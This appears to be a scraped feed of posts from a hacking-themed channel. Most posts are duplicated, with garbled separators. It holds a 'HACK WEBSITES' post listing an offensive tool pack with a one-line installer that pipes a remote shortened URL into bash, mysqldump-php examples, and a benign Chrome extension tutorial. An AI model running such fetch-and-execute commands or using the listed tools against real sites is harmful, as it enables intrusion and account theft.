6) Select the drawing to be exported from the frame, and select the frame from the upper left corner to the lower right corner, which is the range to be printed. Then you can click the preview to see
7) Then you can click the preview to see, no problem, you can click OK, and the PDF format will come out.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ HACK WEBSITES UPDATED 2020-ROOT TERMUX-LINUX
instagram.com/UndercOdeTestingCompany
π¦ Features :
Information Gathering:
Nmap
Setoolkit
Host To IP
WPScan
CMS Scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
Reaver
Pixiewps
Bluetooth Honeypot
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
Commix
FTP Auto Bypass
JBoss Autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
Ports Scan (common ports)
Get server Info
π¦Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman
π¦ πβπππΈπππππΈπππβ & βπβ:
for termux - linux :
> bash <(wget -qO- https://git.io/vAtmB)
for more https://github.com/Manisso/fsociety
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ HACK WEBSITES UPDATED 2020-ROOT TERMUX-LINUX
instagram.com/UndercOdeTestingCompany
π¦ Features :
Information Gathering:
Nmap
Setoolkit
Host To IP
WPScan
CMS Scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
Reaver
Pixiewps
Bluetooth Honeypot
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
Commix
FTP Auto Bypass
JBoss Autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
Ports Scan (common ports)
Get server Info
π¦Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman
π¦ πβπππΈπππππΈπππβ & βπβ:
for termux - linux :
> bash <(wget -qO- https://git.io/vAtmB)
for more https://github.com/Manisso/fsociety
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Manisso/fsociety: fsociety Hacking Tools Pack β A Penetration Testing Framework
fsociety Hacking Tools Pack β A Penetration Testing Framework - Manisso/fsociety
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Php Dumper shell script example :
http://pinterest.com/UndercOdeOfficial
<?php
use Ifsnop\Mysqldump as IMysqldump;
try {
$dump = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
} catch (\Exception $e) {
echo 'mysqldump-php error: ' . $e->getMessage();
}
Plain old PHP:
<?php
include_once(dirname(FILE) . '/mysqldump-php-2.0.0/src/Ifsnop/Mysqldump/Mysqldump.php');
$dump = new Ifsnop\Mysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
π¦ Changing values when exporting
You can register a callable that will be used to transform values during the export. An example use-case for this is removing sensitive data from database dumps:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTransformTableRowHook(function ($tableName, array $row) {
if ($tableName === 'customers') {
$row['social_security_number'] = (string) rand(1000000, 9999999);
}
return $row;
});
$dumper->start('storage/work/dump.sql');
π¦Table specific export limits
You can register table specific 'limits' to limit the returned rows on a per table basis:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTableLimits(array(
'users' => 300,
'logs' => 50,
'posts' => 10
));
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Php Dumper shell script example :
http://pinterest.com/UndercOdeOfficial
<?php
use Ifsnop\Mysqldump as IMysqldump;
try {
$dump = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
} catch (\Exception $e) {
echo 'mysqldump-php error: ' . $e->getMessage();
}
Plain old PHP:
<?php
include_once(dirname(FILE) . '/mysqldump-php-2.0.0/src/Ifsnop/Mysqldump/Mysqldump.php');
$dump = new Ifsnop\Mysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dump->start('storage/work/dump.sql');
π¦ Changing values when exporting
You can register a callable that will be used to transform values during the export. An example use-case for this is removing sensitive data from database dumps:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTransformTableRowHook(function ($tableName, array $row) {
if ($tableName === 'customers') {
$row['social_security_number'] = (string) rand(1000000, 9999999);
}
return $row;
});
$dumper->start('storage/work/dump.sql');
π¦Table specific export limits
You can register table specific 'limits' to limit the returned rows on a per table basis:
$dumper = new IMysqldump\Mysqldump('mysql:host=localhost;dbname=testdb', 'username', 'password');
$dumper->setTableLimits(array(
'users' => 300,
'logs' => 50,
'posts' => 10
));
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Dump sql 2020 code :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Constructor and default parameters
/**
* Constructor of Mysqldump. Note that in the case of an SQLite database
* connection, the filename must be in the $db parameter.
*
* @param string $dsn PDO DSN connection string
* @param string $user SQL account username
* @param string $pass SQL account password
* @param array $dumpSettings SQL database settings
* @param array $pdoSettings PDO configured attributes
*/
public function __construct(
$dsn = '',
$user = '',
$pass = '',
$dumpSettings = array(),
$pdoSettings = array()
)
$dumpSettingsDefault = array(
'include-tables' => array(),
'exclude-tables' => array(),
'compress' => Mysqldump::NONE,
'init_commands' => array(),
'no-data' => array(),
'reset-auto-increment' => false,
'add-drop-database' => false,
'add-drop-table' => false,
'add-drop-trigger' => true,
'add-locks' => true,
'complete-insert' => false,
'databases' => false,
'default-character-set' => Mysqldump::UTF8,
'disable-keys' => true,
'extended-insert' => true,
'events' => false,
'hex-blob' => true, /* faster than escaped content */
'insert-ignore' => false,
'net_buffer_length' => self::MAXLINESIZE,
'no-autocommit' => true,
'no-create-info' => false,
'lock-tables' => true,
'routines' => false,
'single-transaction' => true,
'skip-triggers' => false,
'skip-tz-utc' => false,
'skip-comments' => false,
'skip-dump-date' => false,
'skip-definer' => false,
'where' => '',
/* deprecated */
'disable-foreign-keys-check' => true
);
$pdoSettingsDefaults = array(
PDO::ATTR_PERSISTENT => true,
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::MYSQL_ATTR_USE_BUFFERED_QUERY => false
);
// missing settings in constructor will be replaced by default options
$this->_pdoSettings = self::array_replace_recursive($pdoSettingsDefault, $pdoSettings);
$this->_dumpSettings = self::array_replace_recursive($dumpSettingsDefault, $dumpSettings);
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Dump sql 2020 code :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Constructor and default parameters
/**
* Constructor of Mysqldump. Note that in the case of an SQLite database
* connection, the filename must be in the $db parameter.
*
* @param string $dsn PDO DSN connection string
* @param string $user SQL account username
* @param string $pass SQL account password
* @param array $dumpSettings SQL database settings
* @param array $pdoSettings PDO configured attributes
*/
public function __construct(
$dsn = '',
$user = '',
$pass = '',
$dumpSettings = array(),
$pdoSettings = array()
)
$dumpSettingsDefault = array(
'include-tables' => array(),
'exclude-tables' => array(),
'compress' => Mysqldump::NONE,
'init_commands' => array(),
'no-data' => array(),
'reset-auto-increment' => false,
'add-drop-database' => false,
'add-drop-table' => false,
'add-drop-trigger' => true,
'add-locks' => true,
'complete-insert' => false,
'databases' => false,
'default-character-set' => Mysqldump::UTF8,
'disable-keys' => true,
'extended-insert' => true,
'events' => false,
'hex-blob' => true, /* faster than escaped content */
'insert-ignore' => false,
'net_buffer_length' => self::MAXLINESIZE,
'no-autocommit' => true,
'no-create-info' => false,
'lock-tables' => true,
'routines' => false,
'single-transaction' => true,
'skip-triggers' => false,
'skip-tz-utc' => false,
'skip-comments' => false,
'skip-dump-date' => false,
'skip-definer' => false,
'where' => '',
/* deprecated */
'disable-foreign-keys-check' => true
);
$pdoSettingsDefaults = array(
PDO::ATTR_PERSISTENT => true,
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::MYSQL_ATTR_USE_BUFFERED_QUERY => false
);
// missing settings in constructor will be replaced by default options
$this->_pdoSettings = self::array_replace_recursive($pdoSettingsDefault, $pdoSettings);
$this->_dumpSettings = self::array_replace_recursive($dumpSettingsDefault, $dumpSettings);
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chromoe extension full part 1 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) manifest.json
The manifest.json file tells Chrome important information about your extension, like its name and which permissions it needs.
The most basic possible extension is a directory with a manifest.json file. Letβs create a directory and put the following JSON into manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1"
}
Thatβs the most basic possible manifest.json, with all required fields filled in. The manifest_version should always be 2, because version 1 is unsupported as of January 2014. So far our extension does absolutely nothing, but letβs load it into Chrome anyway.
2) Load your extension into Chrome
To load your extension in Chrome, open up chrome://extensions/ in your browser and click βDeveloper modeβ in the top right. Now click βLoad unpacked extensionβ¦β and select the extensionβs directory. You should now see your extension in the list.
3) When you change or add code in your extension, just come back to this page and reload the page. Chrome will reload your extension.
π¦Content scripts
A content script is βa JavaScript file that runs in the context of web pages.β This means that a content script can interact with web pages that the browser visits. Not every JavaScript file in a Chrome extension can do this; weβll see why later.
1) Letβs add a content script named content.js:
// content.js
alert("Hello from your Chrome extension!")
To inject the script, we need to tell our manifest.json file about it.
2) Add this to your manifest.json file:
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["content.js"]
}
]
3) This tells Chrome to inject content.js into every page we visit using the special <all_urls> URL pattern. If we want to inject the script on only some pages, we can use match patterns. Here are a few examples of values for "matches":
["https://mail.google.com/*", "http://mail.google.com/*"] injects our script into HTTPS and HTTP Gmail. If we have / at the end instead of /*, it matches the URLs exactly, and so would only inject into https://mail.google.com/, not https://mail.google.com/mail/u/0/#inbox. Usually that isnβt what you want.
http://*/* will match any http URL, but no other scheme. For example, this wonβt inject your script into https sites.
4) Reload your Chrome extension. Every single page you visit now pops up an alert. Letβs log the first URL on the page instead.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chromoe extension full part 1 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) manifest.json
The manifest.json file tells Chrome important information about your extension, like its name and which permissions it needs.
The most basic possible extension is a directory with a manifest.json file. Letβs create a directory and put the following JSON into manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1"
}
Thatβs the most basic possible manifest.json, with all required fields filled in. The manifest_version should always be 2, because version 1 is unsupported as of January 2014. So far our extension does absolutely nothing, but letβs load it into Chrome anyway.
2) Load your extension into Chrome
To load your extension in Chrome, open up chrome://extensions/ in your browser and click βDeveloper modeβ in the top right. Now click βLoad unpacked extensionβ¦β and select the extensionβs directory. You should now see your extension in the list.
3) When you change or add code in your extension, just come back to this page and reload the page. Chrome will reload your extension.
π¦Content scripts
A content script is βa JavaScript file that runs in the context of web pages.β This means that a content script can interact with web pages that the browser visits. Not every JavaScript file in a Chrome extension can do this; weβll see why later.
1) Letβs add a content script named content.js:
// content.js
alert("Hello from your Chrome extension!")
To inject the script, we need to tell our manifest.json file about it.
2) Add this to your manifest.json file:
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["content.js"]
}
]
3) This tells Chrome to inject content.js into every page we visit using the special <all_urls> URL pattern. If we want to inject the script on only some pages, we can use match patterns. Here are a few examples of values for "matches":
["https://mail.google.com/*", "http://mail.google.com/*"] injects our script into HTTPS and HTTP Gmail. If we have / at the end instead of /*, it matches the URLs exactly, and so would only inject into https://mail.google.com/, not https://mail.google.com/mail/u/0/#inbox. Usually that isnβt what you want.
http://*/* will match any http URL, but no other scheme. For example, this wonβt inject your script into https sites.
4) Reload your Chrome extension. Every single page you visit now pops up an alert. Letβs log the first URL on the page instead.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 2 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Logging the URL
jQuery isnβt necessary, but it makes everything easier. First, download a version of jQuery from the jQuery CDN and put it in your extensionβs folder. I downloaded the latest minified version, jquery-2.1.3.min.js. To load it, add it to manifest.json before "content.js". Your whole manifest.json should look like this:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["jquery-2.1.3.min.js", "content.js"]
}
]
}
2) Now that we have jQuery, letβs use it to log the URL of the first external link on the page in content.js:
// content.js
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
Note that we donβt need to use jQuery to check if the document has loaded. By default, Chrome injects content scripts after the DOM is complete.
3) Try it out - you should see the output in your console on every page you visit.
4) Browser Actions
When an extension adds a little icon next to your address bar, thatβs a browser action. Your extension can listen for clicks on that button and then do something.
5) Put the icon.png from Googleβs extension tutorial in your extension folder and add this to manifest.json:
"browser_action": {
"default_icon": "icon.png"
}
6) In order to use the browser action, we need to add message passing.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 2 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Logging the URL
jQuery isnβt necessary, but it makes everything easier. First, download a version of jQuery from the jQuery CDN and put it in your extensionβs folder. I downloaded the latest minified version, jquery-2.1.3.min.js. To load it, add it to manifest.json before "content.js". Your whole manifest.json should look like this:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["jquery-2.1.3.min.js", "content.js"]
}
]
}
2) Now that we have jQuery, letβs use it to log the URL of the first external link on the page in content.js:
// content.js
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
Note that we donβt need to use jQuery to check if the document has loaded. By default, Chrome injects content scripts after the DOM is complete.
3) Try it out - you should see the output in your console on every page you visit.
4) Browser Actions
When an extension adds a little icon next to your address bar, thatβs a browser action. Your extension can listen for clicks on that button and then do something.
5) Put the icon.png from Googleβs extension tutorial in your extension folder and add this to manifest.json:
"browser_action": {
"default_icon": "icon.png"
}
6) In order to use the browser action, we need to add message passing.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 3 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Message passing
1) A content script has access to the current page, but is limited in the APIs it can access. For example, it cannot listen for clicks on the browser action. We need to add a different type of script to our extension, a background script, which has access to every Chrome API but cannot access the current page. As Google puts it:
2) Content scripts have some limitations. They cannot use chrome.* APIs, with the exception of extension, i18n, runtime, and storage.
3) So the content script will be able to pull a URL out of the current page, but will need to hand that URL over to the background script to do something useful with it. In order to communicate, weβll use what Google calls message passing, which allows scripts to send and listen for messages. It is the only way for content scripts and background scripts to interact.
4) Add the following to tell manifest.json about the background script:
"background": {
"scripts": ["background.js"]
}
Now weβll add background.js:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
5) This sends an arbitrary JSON payload to the current tab. The keys of the JSON payload can be anything, but I chose "message" for simplicity. Now we need to listen for that message in content.js:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
}
}
);
6) Notice that all of our previous code has been moved into the listener, so that it is only run when the payload is received. Every time you click the browser action icon, you should see a URL get logged to the console. If itβs not working, try reloading the extension and then reloading the page.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 3 :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Message passing
1) A content script has access to the current page, but is limited in the APIs it can access. For example, it cannot listen for clicks on the browser action. We need to add a different type of script to our extension, a background script, which has access to every Chrome API but cannot access the current page. As Google puts it:
2) Content scripts have some limitations. They cannot use chrome.* APIs, with the exception of extension, i18n, runtime, and storage.
3) So the content script will be able to pull a URL out of the current page, but will need to hand that URL over to the background script to do something useful with it. In order to communicate, weβll use what Google calls message passing, which allows scripts to send and listen for messages. It is the only way for content scripts and background scripts to interact.
4) Add the following to tell manifest.json about the background script:
"background": {
"scripts": ["background.js"]
}
Now weβll add background.js:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
5) This sends an arbitrary JSON payload to the current tab. The keys of the JSON payload can be anything, but I chose "message" for simplicity. Now we need to listen for that message in content.js:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
}
}
);
6) Notice that all of our previous code has been moved into the listener, so that it is only run when the payload is received. Every time you click the browser action icon, you should see a URL get logged to the console. If itβs not working, try reloading the extension and then reloading the page.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 4-final :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Opening a new tab
We can use the chrome.tabs API to open a new tab:
chrome.tabs.create({"url": "http://google.com"});
But chrome.tabs can only be used by background.js, so weβll have to add some more message passing since background.js can open the tab, but canβt grab the URL. Hereβs the idea:
2) Listen for a click on the browser action in background.js. When itβs clicked, send a clicked_browser_action event to content.js.
When content.js receives the event, it grabs the URL of the first link on the page. Then it sends open_new_tab back to background.js with the URL to open.
background.js listens for open_new_tab and opens a new tab with the given URL when it receives the message.
3) Clicking on the browser action will trigger background.js, which will send a message to content.js, which will send a URL back to background.js, which will open a new tab with the given URL.
4) First, we need to tell content.js to send the URL to background.js. Change content.js to use this code:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
// This line is new!
chrome.runtime.sendMessage({"message": "open_new_tab", "url": firstHref});
}
}
);
5) Now we need to add some code to tell background.js to listen for that event:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
// This block is new!
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "open_new_tab" ) {
chrome.tabs.create({"url": request.url});
}
}
);
6) Now when you click on the browser action icon, it opens a new tab with the first external URL on the page.
π¦ Wrapping it up
The full content.js and background.js are above. Hereβs the full manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"background": {
"scripts": ["background.js"]
},
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["jquery-2.1.3.min.js", "content.js"]
}
],
"browser_action": {
"default_icon": "icon.png"
}
}
And hereβs the full directory structure:
.
βββ background.js
βββ content.js
βββ icon.png
βββ jquery-2.1.3.min.js
βββ manifest.json
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 4-final :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Opening a new tab
We can use the chrome.tabs API to open a new tab:
chrome.tabs.create({"url": "http://google.com"});
But chrome.tabs can only be used by background.js, so weβll have to add some more message passing since background.js can open the tab, but canβt grab the URL. Hereβs the idea:
2) Listen for a click on the browser action in background.js. When itβs clicked, send a clicked_browser_action event to content.js.
When content.js receives the event, it grabs the URL of the first link on the page. Then it sends open_new_tab back to background.js with the URL to open.
background.js listens for open_new_tab and opens a new tab with the given URL when it receives the message.
3) Clicking on the browser action will trigger background.js, which will send a message to content.js, which will send a URL back to background.js, which will open a new tab with the given URL.
4) First, we need to tell content.js to send the URL to background.js. Change content.js to use this code:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
// This line is new!
chrome.runtime.sendMessage({"message": "open_new_tab", "url": firstHref});
}
}
);
5) Now we need to add some code to tell background.js to listen for that event:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
// This block is new!
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "open_new_tab" ) {
chrome.tabs.create({"url": request.url});
}
}
);
6) Now when you click on the browser action icon, it opens a new tab with the first external URL on the page.
π¦ Wrapping it up
The full content.js and background.js are above. Hereβs the full manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"background": {
"scripts": ["background.js"]
},
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["jquery-2.1.3.min.js", "content.js"]
}
],
"browser_action": {
"default_icon": "icon.png"
}
}
And hereβs the full directory structure:
.
βββ background.js
βββ content.js
βββ icon.png
βββ jquery-2.1.3.min.js
βββ manifest.json
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β